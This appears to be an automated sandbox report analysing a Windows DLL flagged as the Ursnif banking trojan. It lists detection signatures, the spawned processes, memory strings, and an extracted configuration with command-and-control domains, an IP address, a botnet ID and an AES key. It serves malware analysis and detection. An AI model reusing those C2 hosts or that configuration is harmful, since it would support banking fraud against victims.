Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll

Overview

General Information

Sample Name:c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll
Analysis ID:753126
MD5:590d96a7be55240ad868ebec78ce38f2
SHA1:2aaf8acb010dfe83b808d7cc77f6821aaf44f3d2
SHA256:846a8058cda54207aebb885f99dab0eab57529eb8dd94a3d57bbde2e93c4aad4
Tags:exe
Infos:

Detection

Ursnif
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 5252 cmdline: loaddll64.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll" MD5: C676FC0263EDD17D4CE7D644B8F3FCD6)
    • conhost.exe (PID: 1332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 916 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 4540 cmdline: rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 4848 cmdline: regsvr32.exe /s C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll MD5: D78B75FC68247E8A63ACBA846182740E)
      • cmd.exe (PID: 5680 cmdline: cmd /c "echo Commands" >> C:\Users\user\AppData\Local\Temp\2F60.tmp MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 2356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 1380 cmdline: cmd /c "dir" >> C:\Users\user\AppData\Local\Temp\2F60.tmp MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 1364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • rundll32.exe (PID: 864 cmdline: rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 5052 cmdline: rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,FgnfMvSNFULXZx MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 5904 cmdline: rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,KVpawdrrKTUjeZuk MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
{"c2_domain": ["https://higmon.cyou", "https://prises.cyou"], "botnet": "202208151", "aes key": "VHpr3Unea0fVqBYc", "sleep time": "1", "request time": "10", "host keep time": "2", "host shift time": "1"}
SourceRuleDescriptionAuthorStrings
Process Memory Space: loaddll64.exe PID: 5252JoeSecurity_Ursnifv4Yara detected UrsnifJoe Security
    Process Memory Space: regsvr32.exe PID: 4848JoeSecurity_Ursnifv4Yara detected UrsnifJoe Security
      Process Memory Space: rundll32.exe PID: 4540JoeSecurity_Ursnifv4Yara detected UrsnifJoe Security
        Process Memory Space: rundll32.exe PID: 864JoeSecurity_Ursnifv4Yara detected UrsnifJoe Security
          No Sigma rule has matched
          Timestamp:192.168.2.78.8.8.860326532039637 11/24/22-10:49:03.324067
          SID:2039637
          Source Port:60326
          Destination Port:53
          Protocol:UDP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllVirustotal: Detection: 33%Perma Link
          Source: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllReversingLabs: Detection: 21%
          Source: https://higmon.cyou/index.htmlceAvira URL Cloud: Label: malware
          Source: https://higmon.cyou/index.htmlAvira URL Cloud: Label: malware
          Source: https://higmon.cyou/Avira URL Cloud: Label: malware
          Source: https://prises.cyouAvira URL Cloud: Label: malware
          Source: https://higmon.cyouAvira URL Cloud: Label: malware
          Source: higmon.cyouVirustotal: Detection: 20%Perma Link
          Source: https://prises.cyouVirustotal: Detection: 18%Perma Link
          Source: https://higmon.cyou/index.htmlVirustotal: Detection: 10%Perma Link
          Source: 3.2.regsvr32.exe.ac1e00.0.raw.unpackMalware Configuration Extractor: Ursnif {"c2_domain": ["https://higmon.cyou", "https://prises.cyou"], "botnet": "202208151", "aes key": "VHpr3Unea0fVqBYc", "sleep time": "1", "request time": "10", "host keep time": "2", "host shift time": "1"}
          Source: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

          Networking

          barindex
          Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 45.8.147.179 443Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeDomain query: higmon.cyou
          Source: TrafficSnort IDS: 2039637 ET TROJAN Observed DNS Query to Ursnif Domain (higmon .cyou) 192.168.2.7:60326 -> 8.8.8.8:53
          Source: Joe Sandbox ViewASN Name: VMAGE-ASRU VMAGE-ASRU
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
          Source: loaddll64.exe, 00000000.00000002.587434823.0000023124120000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.701616295.00000000027E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.701604821.000000000266E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.311124854.000002233FD80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.311225044.0000020DA3AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://higmon.cyou
          Source: regsvr32.exe, 00000003.00000002.701457779.0000000000AE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://higmon.cyou/
          Source: regsvr32.exe, 00000003.00000002.701416611.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.701474761.0000000000B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://higmon.cyou/index.html
          Source: regsvr32.exe, 00000003.00000002.701416611.0000000000A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://higmon.cyou/index.htmlce
          Source: regsvr32.exe, 00000003.00000002.701604821.000000000266E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://higmon.cyouhttps://prises.cyou
          Source: loaddll64.exe, 00000000.00000002.587439990.0000023124122000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.701620342.00000000027E2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.311135038.000002233FD82000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.311230320.0000020DA3AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://http://Mozilla/5.0
          Source: regsvr32.exe, regsvr32.exe, 00000003.00000002.701786113.00007FFA0AE63000.00000008.00000001.01000000.00000003.sdmp, c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllString found in binary or memory: https://my.tealiumiq.com/urest/legacy/tagcompanion/getProfile?utid=
          Source: loaddll64.exe, 00000000.00000002.587434823.0000023124120000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.701616295.00000000027E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.701604821.000000000266E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.311124854.000002233FD80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.311225044.0000020DA3AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://prises.cyou
          Source: unknownDNS traffic detected: queries for: higmon.cyou

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 5252, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4848, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4540, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 864, type: MEMORYSTR

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 5252, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4848, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4540, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 864, type: MEMORYSTR
          Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000508C0_2_000000018000508C
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180004A140_2_0000000180004A14
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180003A240_2_0000000180003A24
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800018440_2_0000000180001844
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180009C540_2_0000000180009C54
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800063440_2_0000000180006344
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800057480_2_0000000180005748
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180002B600_2_0000000180002B60
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180008D780_2_0000000180008D78
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800027D40_2_00000001800027D4
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180004A143_2_0000000180004A14
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800018443_2_0000000180001844
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000508C3_2_000000018000508C
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800063443_2_0000000180006344
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800027D43_2_00000001800027D4
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180003A243_2_0000000180003A24
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180009C543_2_0000000180009C54
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800057483_2_0000000180005748
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180002B603_2_0000000180002B60
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008D783_2_0000000180008D78
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000508C4_2_000000018000508C
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180004A144_2_0000000180004A14
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180003A244_2_0000000180003A24
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800018444_2_0000000180001844
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180009C544_2_0000000180009C54
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800063444_2_0000000180006344
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800057484_2_0000000180005748
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180002B604_2_0000000180002B60
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180008D784_2_0000000180008D78
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800027D44_2_00000001800027D4
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000508C5_2_000000018000508C
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180004A145_2_0000000180004A14
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180003A245_2_0000000180003A24
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800018445_2_0000000180001844
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180009C545_2_0000000180009C54
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800063445_2_0000000180006344
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800057485_2_0000000180005748
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180002B605_2_0000000180002B60
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180008D785_2_0000000180008D78
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800027D45_2_00000001800027D4
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180005CA4 CreateFileW,RtlInitUnicodeString,NtQueryDirectoryFile,CloseHandle,GetLastError,0_2_0000000180005CA4
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180005CA4 CreateFileW,RtlInitUnicodeString,NtQueryDirectoryFile,CloseHandle,GetLastError,3_2_0000000180005CA4
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180005CA4 CreateFileW,RtlInitUnicodeString,NtQueryDirectoryFile,CloseHandle,GetLastError,4_2_0000000180005CA4
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180005CA4 CreateFileW,RtlInitUnicodeString,NtQueryDirectoryFile,CloseHandle,GetLastError,5_2_0000000180005CA4
          Source: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllVirustotal: Detection: 33%
          Source: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllReversingLabs: Detection: 21%
          Source: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1
          Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll"
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,DllRegisterServer
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "echo Commands" >> C:\Users\user\AppData\Local\Temp\2F60.tmp
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,FgnfMvSNFULXZx
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "dir" >> C:\Users\user\AppData\Local\Temp\2F60.tmp
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,KVpawdrrKTUjeZuk
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1Jump to behavior
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllJump to behavior
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,DllRegisterServerJump to behavior
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,FgnfMvSNFULXZxJump to behavior
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,KVpawdrrKTUjeZukJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "echo Commands" >> C:\Users\user\AppData\Local\Temp\2F60.tmpJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "dir" >> C:\Users\user\AppData\Local\Temp\2F60.tmpJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2356:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1332:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1364:120:WilError_01
          Source: C:\Windows\System32\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ManagerMui
          Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\2F60.tmpJump to behavior
          Source: regsvr32.exeString found in binary or memory: ute;top:50%;cursor:pointer}.ui-lightbox-nav-left{left:0}.ui-lightbox-nav-right{right:0}.ui-lightbox-loading{background:url(images/loading.gif) #000 50% no-repeat}.ui-lightbox-caption{padding:.2em .4em;display:none}.ui-lightbox-caption-text{margin:.3em 0 .1em;f
          Source: regsvr32.exeString found in binary or memory: ;padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}select.input-group-sm>.form-control,select.input-group-sm>.input-group-addon,select.input-group-sm>.input-group-btn>.btn{height:30px;line-height:30px}select[multiple].input-group-sm>.form-contr
          Source: regsvr32.exeString found in binary or memory: cess .form-control{border-color:#3c763d;box-shadow:inset 0 1px 1px rgba(0,0,0,.075)}.has-success .form-control:focus{border-color:#2b542c;box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #67b168}.has-success .input-group-addon{color:#3c763d;background-color
          Source: regsvr32.exeString found in binary or memory: l,select[multiple].input-group-sm>.input-group-addon,select[multiple].input-group-sm>.input-group-btn>.btn,textarea.input-group-sm>.form-control,textarea.input-group-sm>.input-group-addon,textarea.input-group-sm>.input-group-btn>.btn{height:auto}.input-group-a
          Source: regsvr32.exeString found in binary or memory: ing:3px}.ui-terminal-input{border:0 none;background-color:transparent;color:inherit;padding:0;margin:0 0 0 2px;width:75%;outline:0;vertical-align:baseline}.ui-terminal-command{margin-left:2px;-moz-margin-start:3px}.ui-terminal-input::-ms-clear{display:none}.ui
          Source: regsvr32.exeString found in binary or memory: ay:block;width:100%}.loading{position:fixed;top:0;left:0;right:0;bottom:0;background-color:#fff;background-image:url(/static/uploads/assets/images/loader.gif);background-position:50% 50%;background-repeat:no-repeat;opacity:0;visibility:hidden;z-index:100}.load
          Source: regsvr32.exeString found in binary or memory: rol,select.input-group-lg>.input-group-addon,select.input-group-lg>.input-group-btn>.btn{height:46px;line-height:46px}select[multiple].input-group-lg>.form-control,select[multiple].input-group-lg>.input-group-addon,select[multiple].input-group-lg>.input-group-
          Source: regsvr32.exeString found in binary or memory: dius:0}.input-group-addon:last-child{border-left:0}.input-group-btn{font-size:0;white-space:nowrap}.input-group-btn,.input-group-btn>.btn{position:relative}.input-group-btn>.btn+.btn{margin-left:-1px}.input-group-btn>.btn:active,.input-group-btn>.btn:focus,.in
          Source: regsvr32.exeString found in binary or memory: yphicon-play:before{content:"\e072"}.glyphicon-pause:before{content:"\e073"}.glyphicon-stop:before{content:"\e074"}.glyphicon-forward:before{content:"\e075"}.glyphicon-fast-forward:before{content:"\e076"}.glyphicon-step-forward:before{content:"\e077"}.glyphico
          Source: regsvr32.exeString found in binary or memory: tn>.btn,textarea.input-group-lg>.form-control,textarea.input-group-lg>.input-group-addon,textarea.input-group-lg>.input-group-btn>.btn{height:auto}.input-group-sm>.form-control,.input-group-sm>.input-group-addon,.input-group-sm>.input-group-btn>.btn{height:30p
          Source: regsvr32.exeString found in binary or memory: -vertical .slick-slide{display:block;height:auto;border:1px solid transparent}.slick-arrow.slick-hidden{display:none}.slick-loading .slick-list{background:#fff url(../static/uploads/assets/images/loader.gif) 50% no-repeat}@font-face{font-family:slick;src:url(.
          Source: regsvr32.exeString found in binary or memory: :inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #c0a16b}.has-warning .input-group-addon{color:#8a6d3b;background-color:#fcf8e3;border-color:#8a6d3b}.has-warning .form-control-feedback{color:#8a6d3b}.has-error .checkbox,.has-error .checkbox-inline,.has-error.checkbox
          Source: regsvr32.exeString found in binary or memory: addon.input-sm{padding:5px 10px;font-size:12px;border-radius:3px}.input-group-addon.input-lg{padding:10px 16px;font-size:18px;border-radius:6px}.input-group-addon input[type=checkbox],.input-group-addon input[type=radio]{margin-top:0}.input-group-addon:first-c
          Source: regsvr32.exeString found in binary or memory: ble;vertical-align:middle}.navbar-form .input-group .form-control,.navbar-form .input-group .input-group-addon,.navbar-form .input-group .input-group-btn{width:auto}.navbar-form .input-group>.form-control{width:100%}.navbar-form .control-label{margin-bottom:0;
          Source: regsvr32.exeString found in binary or memory: don,.input-group-btn,.input-group .form-control{display:table-cell}.input-group-addon:not(:first-child):not(:last-child),.input-group-btn:not(:first-child):not(:last-child),.input-group .form-control:not(:first-child):not(:last-child){border-radius:0}.input-gr
          Source: regsvr32.exeString found in binary or memory: datatable .ui-column-resizer{display:block;position:absolute!important;top:0;right:0;margin:0;width:8px;height:100%;padding:0;cursor:col-resize;border:1px solid transparent}.ui-datatable .ui-column-resizer-helper{width:1px;position:absolute;z-index:10;display:
          Source: regsvr32.exeString found in binary or memory: up-addon,.input-group-btn{width:1%;white-space:nowrap;vertical-align:middle}.input-group-addon{padding:6px 12px;font-size:14px;font-weight:400;line-height:1;color:#555;text-align:center;background-color:#eee;border:1px solid #ccc;border-radius:4px}.input-group
          Source: regsvr32.exeString found in binary or memory: images/loader.gif);background-position:50% 50%;background-repeat:no-repeat;background-size:28px auto}.wrapper{position:relative;overflow:hidden;width:100%;height:100%;min-width:320px}.content{margin:0 auto;background-color:#fff}@media only screen and (max-widt
          Source: regsvr32.exeString found in binary or memory: rgin:0;padding:0;border:0;outline:0;line-height:1.3;text-decoration:none;font-size:100%;list-style:none}.ui-helper-clearfix:after,.ui-helper-clearfix:before{content:"";display:table}.ui-helper-clearfix:after{clear:both}.ui-helper-clearfix{zoom:1}.ui-helper-zfi
          Source: regsvr32.exeString found in binary or memory: ine .input-group .form-control,.form-inline .input-group .input-group-addon,.form-inline .input-group .input-group-btn{width:auto}.form-inline .input-group>.form-control{width:100%}.form-inline .control-label{margin-bottom:0;vertical-align:middle}.form-inline
          Source: regsvr32.exeString found in binary or memory: ,.input-group .form-control:first-child{border-top-right-radius:0;border-bottom-right-radius:0}.input-group-addon:first-child{border-right:0}.input-group-addon:last-child,.input-group-btn:first-child>.btn-group:not(:first-child)>.btn,.input-group-btn:first-chi
          Source: regsvr32.exeString found in binary or memory: 0 1px 1px rgba(0,0,0,.075)}.has-error .form-control:focus{border-color:#843534;box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #ce8483}.has-error .input-group-addon{color:#a94442;background-color:#f2dede;border-color:#a94442}.has-error .form-control-feedba
          Source: regsvr32.exeString found in binary or memory: y:inline-block!important}}@media print{.hidden-print{display:none!important}}.ui-helper-hidden{display:none}.ui-helper-hidden-accessible{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px}.ui-helper-reset{m
          Source: regsvr32.exeString found in binary or memory: nput-group .form-control:focus{z-index:3}.input-group-lg>.form-control,.input-group-lg>.input-group-addon,.input-group-lg>.input-group-btn>.btn{height:46px;padding:10px 16px;font-size:18px;line-height:1.3333333;border-radius:6px}select.input-group-lg>.form-con
          Source: classification engineClassification label: mal88.troj.evad.winDLL@20/1@1/1
          Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllStatic PE information: Image base 0x180000000 > 0x60000000
          Source: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800112EE push rax; ret 0_2_00000001800112EF
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001112F push rcx; iretd 0_2_0000000180011130
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA0AE649F8 push rbx; retf 3_2_00007FFA0AE649F9
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800112EE push rax; ret 3_2_00000001800112EF
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001112F push rcx; iretd 3_2_0000000180011130
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800112EE push rax; ret 4_2_00000001800112EF
          Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001112F push rcx; iretd 4_2_0000000180011130
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800112EE push rax; ret 5_2_00000001800112EF
          Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001112F push rcx; iretd 5_2_0000000180011130
          Source: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllStatic PE information: section name: .sedt
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 5252, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4848, type: MEMORYSTR
